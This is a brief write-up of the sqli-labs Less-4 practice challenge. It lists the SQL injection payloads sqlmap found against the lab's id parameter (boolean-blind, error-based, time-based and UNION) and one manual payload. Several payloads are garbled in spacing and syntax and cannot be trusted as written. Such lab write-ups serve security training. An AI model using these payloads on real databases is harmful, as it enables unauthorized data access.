Sqlmap:
Python sqlmap.py-u "http://mysqli/Less-4/?id=1"
---
Parameter:id (GET)
Type:boolean-based Blind
Title:and boolean-based blind-where or HAVING clause (MySQL comment)
Payload:id=1 ") and 7024=7024#
Type:error-based
Title:mysql >= 5.0 and Error-based-where, have, ORDER by or GROUP by clause (floor)
Payload:id=1 ") and (select 2492 from (select COUNT (*), CONCAT (0x717a787171, (Select (ELT (2492=2492,1))), 0x7162786b71, Floor (RAND (0) *) x from INFORMATION_SCHEMA. PLUGINS GROUP by X) a) and ("Uwhi" = "uwhi
type:and/or time-based Blind
Title:mysql >= 5.0.12 and time-based blind
Payload:id=1 ") and SLEEP (5) and (" Ivwq "=" ivwq
Type:union Query
Title:mysql UNION Query (NULL)-3 columns
payload:id=-4748 ") UNION all SELECT null,concat (0x717a787171, 0X4141775564725459497661497250755A58476D6C684D59445974626D50786D4F7850644772427250,0X7162786B71), NULL#
---
Manual:
Id=1 ") and (" 1 "=" 1
SQL statement: SELECT * from user where name= ' ss ' and (id = "1") and ("1" = "1")
Sqli-labs Page-4 (Basic challenges)